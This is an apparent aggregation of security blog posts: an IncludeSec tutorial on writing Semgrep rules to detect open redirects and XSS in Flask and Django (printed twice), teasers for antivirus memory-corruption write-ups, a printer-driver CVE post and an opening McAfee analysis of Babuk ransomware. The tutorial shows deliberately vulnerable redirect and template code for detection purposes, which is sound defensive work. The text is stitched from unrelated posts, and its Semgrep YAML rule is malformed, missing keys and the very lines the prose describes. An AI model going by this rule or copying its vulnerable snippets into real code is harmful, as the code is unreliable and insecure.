ZecOps suspects that NSO will quickly alter its methods so that the specific IOCs, or indicators of compromise, will be difficult to identify by mobile security researchers. However, with our Mobile EDR product, we can help your organization identify NSO attacks automatically by focusing on the behavior that remains present in the logs in addition to the publically known IOCs.

Note: ZecOps does not collect or access your personal information. ZecOps will only collect information required for mobile security investigations, leaving personal information out.

Inspecting Your Phone – Free Inspection by ZecOps

To help discover these attacks, ZecOps is offering, for a limited time, free mobile inspections to businesses that were targeted by the NSO. Please fill out the form below, and a member of our team will be in touch with you.

We got your request.
Please make sure that you have filled in all the fields.

QilingLab – Release

21 July 2021 at 15:00
Two years ago Ross Marks created the FridaLab challenge as a playground to test and learn how to use the Frida dynamic instrumentation toolkit. At that time, I solved FridaLab and wrote a writeup about it explaining the main APIs and usages of Frida for Android. This helped others to start getting familiar with it and as a reference when developing Frida scripts. After trying Qiling for some time I decided to follow Ross Marks’ steps and to develop a basic playground challenge to make use of the main Qiling features and I obviously called it QilingLab.

Customizing Semgrep Rules for Flask, Django, and Other Popular Web Frameworks

We customize and use Semgrep a lot during our security assessments at IncludeSec because it helps us quickly locate potential areas of concern within large codebases. Static analysis tools (SAST) such as Semgrep are great for aiding our vulnerability hunting efforts and usually can be tied into Continuous Integration (CI) pipelines to help developers catch potential vulnerabilities early in the development process.  In a previous post, we compared two static analysis tools: Brakeman vs. Semgrep. A key takeaway from that post is that when it comes to custom rules, we found that Semgrep was easy to use.

The lovely developers of Semgrep, as well as the general open source community provide pre-written rules for many frameworks that can be used with extreme ease–all it requires is a command line switch and it works. For example:

semgrep --config "p/flask"

Running this on its own can catch bad practices and mistakes. However, writing custom rules can expand Semgrep’s out-of-the-box functionality significantly and is done by advanced security assessors who understand code level security concerns. Whether you want to add rules that look for more specific problems or similar rules with a bigger scope, it’s up to the end-user rule writer to expand in whichever direction they want.

In this post, we walk through some scenarios to write custom Semgrep rules for two popular Python frameworks: Django and Flask.

Why Write Custom Rules for Frameworks?

We see a lot of applications built on top of frameworks like Django and Flask and wanted to prevent duplicative manual effort to identify similar patterns of security concerns on every assessment. While the default community rules are very good in Semgrep, at IncludeSec we needed more than that. Making use of Semgrep’s powerful rules system makes it possible to extend these to cover even more sources of bugs related to framework usage, such as:

  • vulnerabilities caused by use of specific deprecated APIs
  • vulnerabilities caused by lack of error checking in specific patterns
  • vulnerabilities introduced due to lack of locking/mutexes
  • specific combinations of API calls that can cause inefficiencies or loss of performance, or even introduce race conditions

If any of these issues occur frequently on specific APIs, Semgrep is ideal as a one time investment will pay off dividends in the development process.

Making Use of Frameworks 

For developers, using frameworks like Django and Flask make coding easier and more secure. But they aren’t foolproof. If you use them incorrectly, it is still possible to make mistakes. And for each framework, these mistakes tend to follow common patterns.

SAST tools like Semgrep offer the possibility of automating checks for some of these patterns of mistakes to find vulnerabilities that may be common within a framework. 

An analogy for SAST tooling is a compiler whose warnings/errors you can configure extremely easily. This makes it a perfect fit when programming specific frameworks, as you can catch potentially dangerous usages of APIs & unsafe operations before code is ever committed. For auditors it is extremely helpful when working with large codebases, which can be daunting at first due to the sheer amount of code. SAST tooling can locate security “codesmells”, and where there is codesmell, there are often leads to possible security issues.

Step 1. Find patterns of mistakes

In order to write custom rules for a framework, you first have to do some research to identify where in the framework mistakes might occur.

The first place to look when identifying bad habits is the official documentation — often one can find big blocks of formatting with the words WARNING, ERROR, MISTAKE. These blocks can often clue you into common problems with examples, avoiding time wasted searching forums/Stack Overflow posts for common bugs.

The next place to search where one can find real world practical examples would be bug bounty platforms, such as HackerOne, BugCrowd, etc. Searching these platforms can result in quite niche but severe mistakes that might not be in official documentation but can occur in live production applications.

Finally, intentionally vulnerable “hack me” applications such as django.nV, which explain common vulnerabilities that might occur. With concise, straightforward exercises that one can do to learn and also hammer in the impact of the bugs at hand.

For example, in the Flask documentation for logins , a warning block mentions that 

Warning: You MUST validate the value of the next parameter. If you do not, your application will be vulnerable to open redirects. For an example implementation of is_safe_url see this Flask Snippet.

This block warns us about open redirects in the specific login situation it presents, we’ll use something similar for our vulnerable code example: an open redirect where the redirect parameter comes from a url encoded GET request.

Step 2. Identify the pieces of information and the markers in your code

When writing rules, we have to identify the pieces of information that the specific code encodes. This way we can ensure that the patterns we write will be as accurate as possible. Let’s look at an example from Flask:

from flask import redirect
def handle_request(uri):
    #unsafe open_redirect
    return redirect(uri)

In this example code, we can see a piece of Flask code that contains an open redirect vulnerability. We can dissect it into its various properties and see how we can match this in Semgrep. First we’ll mention the specific semantics of this function and what exactly we want to match.


1. @app.route("/redirect/") – Already on the first line we see that our target functions have a route decorator that tells us that this function is used to handle a request, or that it directly receives user input by virtue of being an endpoint handler. Matching route/endpoint handlers is effective because input to an endpoint handler is unsanitized and could be a potential area of concern: 

from flask import redirect 
def do_redirect(uri):
    if is_logging_enabled():
    return redirect(uri)
def handle_request(uri):
    #unsafe open_redirect
    if unsafe_uri(uri):
        return redirect_to_index()
    return do_redirect(uri)

In the listing above if we were to match every function that includes do_redirect instead of only route handlers that include do_redirect we could end up with false positives where an input to a function has already been sanitized. Already here we have some added complexity that does not bode well with other static analysis tools. In this case we would match do_redirect even though the URI it receives has already been sanitized in the function unsafe_uri(uri). This brings us to our first constraint: we need to match route handlers. 

2.    def handle_request(uri):here it’s important that we match a function right below the function decorator, and that this function takes in a parameter. We could match any function that has a route decorator which also contains a redirect, but then we could possibly match a function where the redirect input is constant or comes from sanitized storage. Matching a route handler with a parameter guarantees that it receives unsanitized user input. We can be sure of this because Flask does not do any URL sanitization. Specifying this results in more accurate matching and finer detection and brings us to our second constraint: that we need to match route handlers with 1 or more parameters

3.    return redirect(uri)here it may seem obvious, all we have to do is match redirect, right? Sadly, it is not that easy. Many APIs can have generic names that may collide with other modules using a generic text/regex search, this can be especially problematic in languages that support function overloading, where a specific overloaded instance of a function may have problems, but other overloaded instances are fine. Not accounting for these may result in many false positives. For example, consider the following snippet:

from robot import redirect
def handle_request(uri):
    #unsafe open_redirect
    return redirect(uri)

If we only matched redirect, we would match the redirect function from a module named robot which could be a false positive. An even more horrifying scenario to match would be an API or module that is imported under another name, e.g.:

from flask import redirect as rd

Thankfully, specifying the origin of the function allows Semgrep to handle all these cases and we’ll go more into detail on this when developing the patterns.

What does a good pattern account for?

A good pattern depends on your goals and how you use rules: finding performance bottlenecks, enforcing better programming practices, or finding security concerns as an auditor, everyone’s needs are different.

For a security assessment, it is important to find potential areas of concern, for example often areas that do not include sanitization are potentially dangerous. Ideally we want to eliminate as many false positives as possible and we can do this by excluding functions with sanitization. This brings us to our final constraint: we don’t want to match any functions containing sanitization keywords.

The Constraints

So far we have the following constraints:

  • match a route handler
  • match a function that takes in 1 or more parameters
  • match a redirect in the function that takes in a parameter from the function
  • IDEALLY: don’t match a function containing sanitization keywords

Step 3. Developing The Pattern

Now that we know all the constraints, and the semantics of the code we want to match we can finally start writing the pattern. I’ll put the end pattern for display, and we’ll dissect it together. Semgrep takes YAML files that describe multiple rules. Each rule contains a specific pattern to match.

- id: my_pattern_id
  - python
  message: found open redirect
  severity: ERROR
  - pattern-inside: |
      def $X(..., $URI_VAR, ...):
  - pattern-not-regex: (sanitize|validate|safe|check|verify) 

rules: – Every Semgrep rule file has to start with the rules tag, this is an array of rules as a Semgrep rule file may contain multiple rules.

- id: my_pattern_id Every Semgrep rule in the rules array has an id, this is essentially the name of the rule and must be unique.

  - python

The language this rule works with. This determines how it parses the pattern & which files it checks.

message: found open redirect the message displayed when the Semgrep search matches a pattern, you can think of this like a compiler warning message.

severity: ERROR determines the color and other aspects of the messages upon a successful match. You can think of this as a compiler error, except it’s just a more severe warning, this is good for filtering through different levels of matches with Semgrep, or to cut down on time by searching only for erroneous patterns.

  - pattern: |
      def $X(..., $URI_VAR, ...):
  - pattern-not-regex: (sanitize|validate|safe|check|verify)

This is the final part of the rule and contains the actual logic of the pattern, a rule has to contain a top-level pattern element. In order for a match to be successful the final result of all the logic has to be true. In this case the top level element is a patterns, which only returns true if all the elements underneath it return true.

  - pattern: |
      def $X(..., $URI_VAR, ...):

This pattern searches for code that satisfies the first 3 constraints, with the ellipsis representing anything. @app.route(...) will match any call to that function with any number of arguments (including none).

def $X(..., $URI_VAR, ...):

matches any function, and stores its name in the variable $X. It then matches any argument in this function, whether it be in the middle or at the end and stores it in $URI_VAR.

The Ellipsis following matches any code in this function until the next statement in the pattern which in this case is flask.redirect($URI_VAR) which matches redirect only if its arguments come from the function variable $URI_VAR. If these constraints are all satisfied, it then passes the text it matches onto the next pattern and it returns true.

One amazing feature of Semgrep is its ability to match fully qualified function names, even when they are imported with an alias. In this case, matching flask.redirect($URI_VAR) would match only redirects from flask, even if they are imported with another name (such as redir or rd).

- pattern-not-regex: (sanitize|validate|safe|check|verify)

This pattern is responsible for eliminating potential false positives. It’s very simple: it runs a regex against the matched text and if the regex comes back with any matches, it returns false otherwise it returns true. This element is responsible for checking if sanitization elements exist in the function code. The text that is used to check for these sanitization elements is obviously not perfect, but it can be tailored to the project you are working on and can always be extended to include more possible keywords.

Step 4. Testing & Debugging

Now that we’ve made our pattern, we can test it on the online Semgrep playground to see if it works. Here we can make small changes and get instant feedback in order to improve our patterns. Below is an example of the rules at work matching the unsanitized open redirect and ignoring the safe redirect.

Trade Offs, Quantity vs Quality

When designing these patterns, it’s possible to spend all your time trying to write the best pattern that catches every situation, filters out all the false-positives and what not, but this is an almost futile endeavor and can lead into rabbit holes. Also, overly precise rules may filter things that weren’t even meant to be filtered. The dilemma always comes down to how many false positives are you willing to handle–this tradeoff is up to Semgrep users to decide for themselves. When absolutely critical it may be better to have more false positives but to catch everything, whereas from an auditor’s perspective it may be better to have a more precise ruleset to start with a good lead and to be efficient, and then audit unmatched code later. Or perhaps a graduated approach where higher false positive rules are enabled for subsequent runs of SAST tooling.

Return on Investment

When it comes to analysis tools, it’s important to understand how much you need to set up & maintain to truly get value back. If they are complicated to update and maintain sometimes it’s just not worth it. The great upside to Semgrep is the ease of use–one can start developing patterns after doing the 20 minute tutorial and make a significant amount of rules in a day, and the benefits can be felt immediately. It requires no fiddling with versions or complicated compiler setup, and once a ruleset has been developed it’ll work on any supported languages. 

Showcase – Django.nV

Django.nV is a very well-made intentionally vulnerable application that uses the Django framework to introduce a variety of bugs for learning framework-specific penetration testing, from XSS to more framework specific bugs. Thanks to nVisium for making a great training application open source!

We used Django.nV to test IncludeSec’s inhouse rules and came up with 4 new instances of vulnerabilities that the community rulesets missed:

severity:warning rule:MD5Hasher for password: use a more secure hashing algorithm for password
124:PASSWORD_HASHERS = ['django.contrib.auth.hashers.MD5PasswordHasher']
severity:error rule:Unsafe XSS usage: unsafe template usage in html,
58:                        <span class="username"><i class="fa fa-user fa-fw"></i> {{ user.username|safe }}</span>
severity:error rule:Unsafe XSS usage: unsafe template usage in html,
54:                        <span class="username">{{ user.username|safe }}</span>
severity:warning rule:django open redirect: unvalidated open redirect
394:    return redirect(request.GET.get('redirect', '/taskManager/'))

MD5Hashing – detects that the MD5Hasher has been used for passwords, which is cryptographically insecure.

Unsafe template usage in HTML – detects the use of user parameters with the safe keyword in html, which could introduce XSS.

Open redirect – very similar to the example patterns we already discussed. It detects an open redirect in the logout view.

We’ve collaborated with the kind developers of Semgrep and the people over at returntocorp (ret2c) to get certain rules in the default Django Semgrep rule repository.


In conclusion, Semgrep makes it relatively painless to write custom static analysis rules to audit applications. Improper usage of framework APIs can be a common source of bugs, and we at IncludeSec found that a small amount of up front investment learning the syntax paid dividends when auditing applications using these frameworks.

The post Customizing Semgrep Rules for Flask, Django, and Other Popular Web Frameworks appeared first on Include Security Research Blog.

Customizing Semgrep Rules for Flask/Django and Other Popular Web Frameworks

We customize and use Semgrep a lot during our security assessments at IncludeSec because it helps us quickly locate potential areas of concern within large codebases. Static analysis tools (SAST) such as Semgrep are great for aiding our vulnerability hunting efforts and usually can be tied into Continuous Integration (CI) pipelines to help developers catch potential vulnerabilities early in the development process.  In a previous post, we compared two static analysis tools: Brakeman vs. Semgrep. A key takeaway from that post is that when it comes to custom rules, we found that Semgrep was easy to use.

The lovely developers of Semgrep, as well as the general open source community provide pre-written rules for many frameworks that can be used with extreme ease–all it requires is a command line switch and it works. For example:

semgrep --config "p/flask"

Running this on its own can catch bad practices and mistakes. However, writing custom rules can expand Semgrep’s out-of-the-box functionality significantly and is done by advanced security assessors who understand code level security concerns. Whether you want to add rules that look for more specific problems or similar rules with a bigger scope, it’s up to the end-user rule writer to expand in whichever direction they want.

In this post, we walk through some scenarios to write custom Semgrep rules for two popular Python frameworks: Django and Flask.

Why Write Custom Rules for Frameworks?

We see a lot of applications built on top of frameworks like Django and Flask and wanted to prevent duplicative manual effort to identify similar patterns of security concerns on every assessment. While the default community rules are very good in Semgrep, at IncludeSec we needed more than that. Making use of Semgrep’s powerful rules system makes it possible to extend these to cover even more sources of bugs related to framework usage, such as:

  • vulnerabilities caused by use of specific deprecated APIs
  • vulnerabilities caused by lack of error checking in specific patterns
  • vulnerabilities introduced due to lack of locking/mutexes
  • specific combinations of API calls that can cause inefficiencies or loss of performance, or even introduce race conditions

If any of these issues occur frequently on specific APIs, Semgrep is ideal as a one time investment will pay off dividends in the development process.

Making Use of Frameworks 

For developers, using frameworks like Django and Flask make coding easier and more secure. But they aren’t foolproof. If you use them incorrectly, it is still possible to make mistakes. And for each framework, these mistakes tend to follow common patterns.

SAST tools like Semgrep offer the possibility of automating checks for some of these patterns of mistakes to find vulnerabilities that may be common within a framework. 

An analogy for SAST tooling is a compiler whose warnings/errors you can configure extremely easily. This makes it a perfect fit when programming specific frameworks, as you can catch potentially dangerous usages of APIs & unsafe operations before code is ever committed. For auditors it is extremely helpful when working with large codebases, which can be daunting at first due to the sheer amount of code. SAST tooling can locate security “codesmells”, and where there is codesmell, there are often leads to possible security issues.

Step 1. Find patterns of mistakes

In order to write custom rules for a framework, you first have to do some research to identify where in the framework mistakes might occur.

The first place to look when identifying bad habits is the official documentation — often one can find big blocks of formatting with the words WARNING, ERROR, MISTAKE. These blocks can often clue you into common problems with examples, avoiding time wasted searching forums/Stack Overflow posts for common bugs.

The next place to search where one can find real world practical examples would be bug bounty platforms, such as HackerOne, BugCrowd, etc. Searching these platforms can result in quite niche but severe mistakes that might not be in official documentation but can occur in live production applications.

Finally, intentionally vulnerable “hack me” applications such as django.nV, which explain common vulnerabilities that might occur. With concise, straightforward exercises that one can do to learn and also hammer in the impact of the bugs at hand.

For example, in the Flask documentation for logins , a warning block mentions that 

Warning: You MUST validate the value of the next parameter. If you do not, your application will be vulnerable to open redirects. For an example implementation of is_safe_url see this Flask Snippet.

This block warns us about open redirects in the specific login situation it presents, we’ll use something similar for our vulnerable code example: an open redirect where the redirect parameter comes from a url encoded GET request.

Step 2. Identify the pieces of information and the markers in your code

When writing rules, we have to identify the pieces of information that the specific code encodes. This way we can ensure that the patterns we write will be as accurate as possible. Let’s look at an example from Flask:

from flask import redirect
def handle_request(uri):
    #unsafe open_redirect
    return redirect(uri)

In this example code, we can see a piece of Flask code that contains an open redirect vulnerability. We can dissect it into its various properties and see how we can match this in Semgrep. First we’ll mention the specific semantics of this function and what exactly we want to match.


1. @app.route("/redirect/") – Already on the first line we see that our target functions have a route decorator that tells us that this function is used to handle a request, or that it directly receives user input by virtue of being an endpoint handler. Matching route/endpoint handlers is effective because input to an endpoint handler is unsanitized and could be a potential area of concern: 

from flask import redirect 
def do_redirect(uri):
    if is_logging_enabled():
    return redirect(uri)
def handle_request(uri):
    #unsafe open_redirect
    if unsafe_uri(uri):
        return redirect_to_index()
    return do_redirect(uri)

In the listing above if we were to match every function that includes do_redirect instead of only route handlers that include do_redirect we could end up with false positives where an input to a function has already been sanitized. Already here we have some added complexity that does not bode well with other static analysis tools. In this case we would match do_redirect even though the URI it receives has already been sanitized in the function unsafe_uri(uri). This brings us to our first constraint: we need to match route handlers. 

2.    def handle_request(uri):here it’s important that we match a function right below the function decorator, and that this function takes in a parameter. We could match any function that has a route decorator which also contains a redirect, but then we could possibly match a function where the redirect input is constant or comes from sanitized storage. Matching a route handler with a parameter guarantees that it receives unsanitized user input. We can be sure of this because Flask does not do any URL sanitization. Specifying this results in more accurate matching and finer detection and brings us to our second constraint: that we need to match route handlers with 1 or more parameters

3.    return redirect(uri)here it may seem obvious, all we have to do is match redirect, right? Sadly, it is not that easy. Many APIs can have generic names that may collide with other modules using a generic text/regex search, this can be especially problematic in languages that support function overloading, where a specific overloaded instance of a function may have problems, but other overloaded instances are fine. Not accounting for these may result in many false positives. For example, consider the following snippet:

from robot import redirect
def handle_request(uri):
    #unsafe open_redirect
    return redirect(uri)

If we only matched redirect, we would match the redirect function from a module named robot which could be a false positive. An even more horrifying scenario to match would be an API or module that is imported under another name, e.g.:

from flask import redirect as rd

Thankfully, specifying the origin of the function allows Semgrep to handle all these cases and we’ll go more into detail on this when developing the patterns.

What does a good pattern account for?

A good pattern depends on your goals and how you use rules: finding performance bottlenecks, enforcing better programming practices, or finding security concerns as an auditor, everyone’s needs are different.

For a security assessment, it is important to find potential areas of concern, for example often areas that do not include sanitization are potentially dangerous. Ideally we want to eliminate as many false positives as possible and we can do this by excluding functions with sanitization. This brings us to our final constraint: we don’t want to match any functions containing sanitization keywords.

The Constraints

So far we have the following constraints:

  • match a route handler
  • match a function that takes in 1 or more parameters
  • match a redirect in the function that takes in a parameter from the function
  • IDEALLY: don’t match a function containing sanitization keywords

Step 3. Developing The Pattern

Now that we know all the constraints, and the semantics of the code we want to match we can finally start writing the pattern. I’ll put the end pattern for display, and we’ll dissect it together. Semgrep takes YAML files that describe multiple rules. Each rule contains a specific pattern to match.

- id: my_pattern_id
  - python
  message: found open redirect
  severity: ERROR
  - pattern-inside: |
      def $X(..., $URI_VAR, ...):
  - pattern-not-regex: (sanitize|validate|safe|check|verify) 

rules: – Every Semgrep rule file has to start with the rules tag, this is an array of rules as a Semgrep rule file may contain multiple rules.

- id: my_pattern_id Every Semgrep rule in the rules array has an id, this is essentially the name of the rule and must be unique.

  - python

The language this rule works with. This determines how it parses the pattern & which files it checks.

message: found open redirect the message displayed when the Semgrep search matches a pattern, you can think of this like a compiler warning message.

severity: ERROR determines the color and other aspects of the messages upon a successful match. You can think of this as a compiler error, except it’s just a more severe warning, this is good for filtering through different levels of matches with Semgrep, or to cut down on time by searching only for erroneous patterns.

  - pattern: |
      def $X(..., $URI_VAR, ...):
  - pattern-not-regex: (sanitize|validate|safe|check|verify)

This is the final part of the rule and contains the actual logic of the pattern, a rule has to contain a top-level pattern element. In order for a match to be successful the final result of all the logic has to be true. In this case the top level element is a patterns, which only returns true if all the elements underneath it return true.

  - pattern: |
      def $X(..., $URI_VAR, ...):

This pattern searches for code that satisfies the first 3 constraints, with the ellipsis representing anything. @app.route(...) will match any call to that function with any number of arguments (including none).

def $X(..., $URI_VAR, ...):

matches any function, and stores its name in the variable $X. It then matches any argument in this function, whether it be in the middle or at the end and stores it in $URI_VAR.

The Ellipsis following matches any code in this function until the next statement in the pattern which in this case is flask.redirect($URI_VAR) which matches redirect only if its arguments come from the function variable $URI_VAR. If these constraints are all satisfied, it then passes the text it matches onto the next pattern and it returns true.

One amazing feature of Semgrep is its ability to match fully qualified function names, even when they are imported with an alias. In this case, matching flask.redirect($URI_VAR) would match only redirects from flask, even if they are imported with another name (such as redir or rd).

- pattern-not-regex: (sanitize|validate|safe|check|verify)

This pattern is responsible for eliminating potential false positives. It’s very simple: it runs a regex against the matched text and if the regex comes back with any matches, it returns false otherwise it returns true. This element is responsible for checking if sanitization elements exist in the function code. The text that is used to check for these sanitization elements is obviously not perfect, but it can be tailored to the project you are working on and can always be extended to include more possible keywords.

Step 4. Testing & Debugging

Now that we’ve made our pattern, we can test it on the online Semgrep playground to see if it works. Here we can make small changes and get instant feedback in order to improve our patterns. Below is an example of the rules at work matching the unsanitized open redirect and ignoring the safe redirect.

Trade Offs, Quantity vs Quality

When designing these patterns, it’s possible to spend all your time trying to write the best pattern that catches every situation, filters out all the false-positives and what not, but this is an almost futile endeavor and can lead into rabbit holes. Also, overly precise rules may filter things that weren’t even meant to be filtered. The dilemma always comes down to how many false positives are you willing to handle–this tradeoff is up to Semgrep users to decide for themselves. When absolutely critical it may be better to have more false positives but to catch everything, whereas from an auditor’s perspective it may be better to have a more precise ruleset to start with a good lead and to be efficient, and then audit unmatched code later. Or perhaps a graduated approach where higher false positive rules are enabled for subsequent runs of SAST tooling.

Return on Investment

When it comes to analysis tools, it’s important to understand how much you need to set up & maintain to truly get value back. If they are complicated to update and maintain sometimes it’s just not worth it. The great upside to Semgrep is the ease of use–one can start developing patterns after doing the 20 minute tutorial and make a significant amount of rules in a day, and the benefits can be felt immediately. It requires no fiddling with versions or complicated compiler setup, and once a ruleset has been developed it’ll work on any supported languages. 

Showcase – Django.nV

Django.nV is a very well-made intentionally vulnerable application that uses the Django framework to introduce a variety of bugs for learning framework-specific penetration testing, from XSS to more framework specific bugs. Thanks to nVisium for making a great training application open source!

We used Django.nV to test IncludeSec’s inhouse rules and came up with 4 new instances of vulnerabilities that the community rulesets missed:

severity:warning rule:MD5Hasher for password: use a more secure hashing algorithm for password
124:PASSWORD_HASHERS = ['django.contrib.auth.hashers.MD5PasswordHasher']
severity:error rule:Unsafe XSS usage: unsafe template usage in html,
58:                        <span class="username"><i class="fa fa-user fa-fw"></i> {{ user.username|safe }}</span>
severity:error rule:Unsafe XSS usage: unsafe template usage in html,
54:                        <span class="username">{{ user.username|safe }}</span>
severity:warning rule:django open redirect: unvalidated open redirect
394:    return redirect(request.GET.get('redirect', '/taskManager/'))

MD5Hashing – detects that the MD5Hasher has been used for passwords, which is cryptographically insecure.

Unsafe template usage in HTML – detects the use of user parameters with the safe keyword in html, which could introduce XSS.

Open redirect – very similar to the example patterns we already discussed. It detects an open redirect in the logout view.

We’ve collaborated with the kind developers of Semgrep and the people over at returntocorp (ret2c) to get certain rules in the default Django Semgrep rule repository.


In conclusion, Semgrep makes it relatively painless to write custom static analysis rules to audit applications. Improper usage of framework APIs can be a common source of bugs, and we at IncludeSec found that a small amount of up front investment learning the syntax paid dividends when auditing applications using these frameworks.

The post Customizing Semgrep Rules for Flask/Django and Other Popular Web Frameworks appeared first on Include Security Research Blog.

Announcing a New Blog Series on Anti-Virus Software

22 June 2017 at 17:40
In the past couple of years, we have seen quite a few critical security issues concerning anti-virus software. A significant number of bugs has been found by Google’s Project Zero, but there is also a lot of effort from other companies as well as from private researchers. Observing those issues, the following question arises naturally: Does anti-virus software decrease the security of our systems? This is a question that has been discussed for many years now, and for many experts the answer seems to be clear.

Avast Antivirus: Remote Stack Buffer Overflow with Magic Numbers

27 June 2017 at 12:05
If I told you I found a remotely triggerable stack-based buffer overflow in a conventional anti-virus product, in what part of the software would you expect it to be? A reasonable guess may be: “Probably in the parsing code of some complicated and likely obsolete file format”. In fact, the most recent anti-virus stack buffer overflows clearly show that the implementation of a parser for complex file formats is extremely challenging.

Bitdefender: Remote Stack Buffer Overflow via 7z PPMD

18 July 2017 at 12:25
If you read my previous blog post and were bored by it, then this might be for you. With the second post of the series, I am delivering on the promise of discussing a bug that occurs in a more complex setting. A bug in a software module that extracts a prominent archive format (such as 7z) needs to be treated with great caution. It is often critical not only for the software itself, but also for many different software products that are sharing the same library or are based on the same reference implementation.

F-Secure Anti-Virus: Arbitrary Free Vulnerability via TNEF

8 August 2017 at 12:40
The previous posts of this blog series have been about stack based buffer overflows. With this post, I want to move on to bugs that involve dynamic memory management. Since there are not that many publicly documented arbitrary free vulnerabilities in prominent software products, I thought it would be worth sharing this one. The Transport Neutral Encapsulation Format (TNEF) is an e-mail attachment format developed by Microsoft. It can be used to represent complicated messages and attachments, consisting of many different files and file types, as a flattened stream.

Bitdefender: Heap Buffer Overflow via 7z LZMA

22 August 2017 at 12:00
A few days after having published the post about the Bitdefender stack buffer overflow via 7z PPMD, I discovered a new bug in Bitdefender’s product. While this is a 7z bug, too, it has nothing to do with the previous bug or with the PPMD codec. Instead, it concerns dynamic memory management. In contrast to the previous post, which described an arbitrary free vulnerability in F-Secure’s anti-virus product, this post presents the first heap buffer overflow of this blog series.

7-Zip: Multiple Memory Corruptions via RAR and ZIP

23 January 2018 at 13:00
In my previous posts about the two Bitdefender bugs related to 7z, I explicitly mentioned that Igor Pavlov’s 7-Zip reference implementation was not affected. Unfortunately, I cannot do the same for the bugs described in this blog post. I found these bugs in a prominent antivirus product and then realized that 7-Zip itself was affected. As the antivirus vendor has not yet published a patch, I will add the name of the affected product in an update to this post as soon as this happens.

7-Zip: From Uninitialized Memory to Remote Code Execution

1 May 2018 at 12:00
After my previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I continued to spend time on analyzing antivirus software. As it happens, I found a new bug that (as the last two bugs) turned out to affect 7-Zip as well. Since the antivirus vendor has not yet published a patch, I will add the name of the affected product in an update to this post as soon as this happens.

F-Secure Anti-Virus: Remote Code Execution via Solid RAR Unpacking

5 June 2018 at 12:00
As I briefly mentioned in my last two posts about the 7-Zip bugs CVE-2017-17969, CVE-2018-5996, and CVE-2018-10115, the products of at least one antivirus vendor were affected by those bugs. Now that all patches have been rolled out, I can finally make the vendor’s name public: It is F-Secure with all of its Windows-based endpoint protection products (including consumer products such as F-Secure Anti-Virus as well as corporate products such as F-Secure Server Security).

Bitdefender: UPX Unpacking Featuring Ten Memory Corruptions

10 November 2020 at 12:00
This post breaks the two-year silence of this blog, showcasing a selection of memory corruption vulnerabilities in Bitdefender’s anti-virus engine. The goal of binary packing is to compress or obfuscate a binary, usually to save space/bandwidth or to evade malware analysis. A packed binary typically contains a compressed/obfuscated data payload. When the binary is executed, a loader decompresses this payload and then jumps to the actual entry point of the (inner) binary.

Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438

By: voidsec
28 July 2021 at 12:00

Last week SentinelOne disclosed a “high severity” flaw in HP, Samsung, and Xerox printer’s drivers (CVE-2021-3438); the blog post highlighted a vulnerable strncpy operation with a user-controllable size parameter but it did not explain the reverse engineering nor the exploitation phase of the issue. With this blog post, I would like to analyse the vulnerability […]

The post Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438 appeared first on VoidSec.

Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems?

29 July 2021 at 04:01

Co-written with Northwave’s Noël Keijzer.

Executive Summary

For a long time, ransomware gangs were mostly focused on Microsoft Windows operating systems. Yes, we observed the occasional dedicated Unix or Linux based ransomware, but cross-platform ransomware was not happening yet. However, cybercriminals never sleep and in recent months we noticed that several ransomware gangs were experimenting with writing their binaries in the cross-platform language Golang (Go).

Our worst fears were confirmed when Babuk announced on an underground forum that it was developing a cross-platform binary aimed at Linux/UNIX and ESXi or VMware systems. Many core backend systems in companies are running on these *nix operating systems or, in the case of virtualization, think about the ESXi hosting several servers or the virtual desktop environment.

We touched upon this briefly in our previous blog, together with the many coding mistakes the Babuk team is making.

Even though Babuk is relatively new to the scene, its affiliates have been aggressively infecting high-profile victims, despite numerous problems with the binary which led to a situation in which files could not be retrieved, even if payment was made.

Ultimately, the difficulties faced by the Babuk developers in creating ESXi ransomware may have led to a change in business model, from encryption to data theft and extortion.

Indeed, the design and coding of the decryption tool are poorly developed, meaning if companies decide to pay the ransom, the decoding process for encrypted files can be really slow and there is no guarantee that all files will be recoverable.

Coverage and Protection Advice

McAfee’s EPP solution covers Babuk ransomware with an array of prevention and detection techniques.

McAfee ENS ATP provides behavioral content focusing on proactively detecting the threat while also delivering known IoCs for both online and offline detections. For DAT based detections, the family will be reported as Ransom-Babuk!. ENS ATP adds 2 additional layers of protection thanks to JTI rules that provide attack surface reduction for generic ransomware behaviors and RealProtect (static and dynamic) with ML models targeting ransomware threats.

Updates on indicators are pushed through GTI, and customers of Insights will find a threat-profile on this ransomware family that is updated when new and relevant information becomes available.

Initially, in our research the entry vector and the complete tactics, techniques and procedures (TTPs) used by the criminals behind Babuk remained unclear.

However, when its affiliate recruitment advertisement came online, and given the specific underground meeting place where Babuk posts, defenders can expect similar TTPs with Babuk as with other Ransomware-as-a-Service families.

In its recruitment posting Babuk specifically asks for individuals with pentest skills, so defenders should be on the lookout for traces and behaviors that correlate to open source penetration testing tools like winPEAS, Bloodhound and SharpHound, or hacking frameworks such as CobaltStrike, Metasploit, Empire or Covenant. Also be on the lookout for abnormal behavior of non-malicious tools that have a dual use, such as those that can be used for things like enumeration and execution, (e.g., ADfind, PSExec, PowerShell, etc.) We advise everyone to read our blogs on evidence indicators for a targeted ransomware attack (Part1Part2).

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common amongst ransomware criminals:

  • E-mail Spearphishing (T1566.001). Often used to directly engage and/or gain an initial foothold, the initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the ransomware gangs to continue completely compromising a victim’s network. We have observed this in the past with Trickbot and Ryuk, Emotet and Prolock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector; cyber criminals are avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door if you have the keys? Weakly protected Remote Desktop Protocol (RDP) access is a prime example of this entry method. For the best tips on RDP security, we would like to highlight our blog explaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as infostealers, that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials are purchased by ransomware criminals to search for VPN and corporate logins. As an organization, robust credential management and multi-factor authentication on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading your endpoint protection, as well as enabling options like tamper protection and rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

